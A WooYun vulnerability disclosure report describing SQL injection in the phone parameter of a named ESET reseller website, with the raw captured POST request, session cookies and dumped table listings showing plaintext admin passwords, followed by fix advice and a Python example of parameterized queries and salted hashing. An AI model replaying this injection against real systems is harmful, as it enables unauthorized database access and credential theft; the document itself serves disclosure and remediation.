Vulnerability summary
Defect ID: wooyun-2014-049134
Title: SQL injection and information disclosure (plaintext passwords) in an ESET NOD32 system
Vendor: ESET NOD32
Author: Mr.leo
Submitted: 2014-01-17 10:56
Fix time: 2014-01-22 10:56
Disclosed: 2014-01-22 10:56
Type: SQL injection
Severity: High
Self-assessed Rank: 15
Status: Vendor has been notified, but the vendor ignored the vulnerability
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability details
Disclosure timeline:
2014-01-17: Details sent to the vendor; awaiting vendor handling
2014-01-22: Vendor chose to ignore the vulnerability; details disclosed to the public
Brief description:
SQL injection and information disclosure (plaintext passwords) in an ESET NOD32 system
Detailed description:
Site:
http://51.eset.com.cn/ (channel sales points system)
The phone parameter is not filtered, which allows SQL injection.
Request captured with Burp:
POST /index.php/user/lookpwd HTTP/1.1
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://51.eset.com.cn/
Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d57d0d9782a1adaa9a207c55dc14b92a%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22112.80.230.66%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221389921049%22%3B%7D880687b93f5defac935eb2eb3f7969fe; PHPSESSID=005e5efc592d8bd666082b4766aded0a
Host: 51.eset.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
phone=123&pwdanswer=1&pwdques=1
Database: 51_v2
[26 tables]
+------------------+
| None |
| admin |
| allow_virtual |
| category |
| config |
| game1 |
| integral_details |
| orderinfo |
| orders |
| phone_tmp |
| prize |
| product_attr |
| product_old |
| province |
| recordhistory |
| sellhistory |
| sellhistory_old |
| stock |
| stock_tmp |
| sysannouncement |
| trackcode_tmp |
| userinfo |
| users |
| users_222 |
| users_old |
| weekreport |
+------------------+
Database: 51_v2
+------------------+---------+
| Table | Entries |
+------------------+---------+
| trackcode_tmp | 22142 |
| sellhistory_old | 9893 |
| recordhistory | 7374 |
| integral_details | 5928 |
| stock | 5488 |
| users_old | 3461 |
| users_222 | 819 |
| sellhistory | 607 |
| weekreport | 385 |
| phone_tmp | 343 |
| users | 235 |
| product_attr | 200 |
| allow_virtual | 63 |
| product_old | 52 |
| game1 | 49 |
| province | 34 |
| userinfo | 32 |
| orders | 12 |
| category | 5 |
| admin | 3 |
| config | 1 |
| prize | 1 |
| sysannouncement | 1 |
+------------------+---------+
The admin table stores passwords in plaintext.
The fields of the USERS table speak for themselves.
over
Proof of vulnerability:
Shown above.
Recommended fix:
1# Filter the parameters
2# Salt the passwords
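The two fixes above, as an added example that is not code from the report or from the ESET system (whose source is not shown): a model of the lookpwd lookup in Python over an in-memory SQLite table, with the string-concatenated query beside a placeholder query, and a salted, iterated hash in place of the plaintext password column. The table and column names are assumptions.

```python
import hashlib
import hmac
import secrets
import sqlite3


def make_db():
    # Constructed stand-in for the 51_v2 users table; columns are assumed.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (phone TEXT, pwdques TEXT, pwdanswer TEXT, "
               "pw_salt TEXT, pw_hash TEXT)")
    return db


def hash_password(password, salt=None):
    """Fix 2#: per-user random salt plus PBKDF2, never the plaintext."""
    salt = salt or secrets.token_hex(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt), 100_000)
    return salt, digest.hex()


def add_user(db, phone, ques, answer, password):
    salt, digest = hash_password(password)
    db.execute("INSERT INTO users VALUES (?, ?, ?, ?, ?)",
               (phone, ques, answer, salt, digest))


def lookpwd_vulnerable(db, phone, ques, answer):
    # The pattern behind the report: request fields pasted into the SQL text,
    # so a quote in `phone` changes the statement itself.
    sql = ("SELECT phone FROM users WHERE phone='%s' AND pwdques='%s' "
           "AND pwdanswer='%s'" % (phone, ques, answer))
    return db.execute(sql).fetchone()


def lookpwd_fixed(db, phone, ques, answer):
    # Fix 1#: placeholders send the values separately from the SQL text,
    # so the same quote is compared as data and simply fails to match.
    sql = "SELECT phone FROM users WHERE phone=? AND pwdques=? AND pwdanswer=?"
    return db.execute(sql, (phone, ques, answer)).fetchone()


def verify_password(db, phone, candidate):
    row = db.execute("SELECT pw_salt, pw_hash FROM users WHERE phone=?",
                     (phone,)).fetchone()
    if row is None:
        return False
    _, digest = hash_password(candidate, row[0])
    return hmac.compare_digest(digest, row[1])
```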
Copyright notice: when reposting, credit the source: Mr.leo@WooYun
Vulnerability response
Vendor response:
Severity: No impact, vendor ignored
Ignored at: 2014-01-22 10:56
Vendor reply:
Latest status:
None yet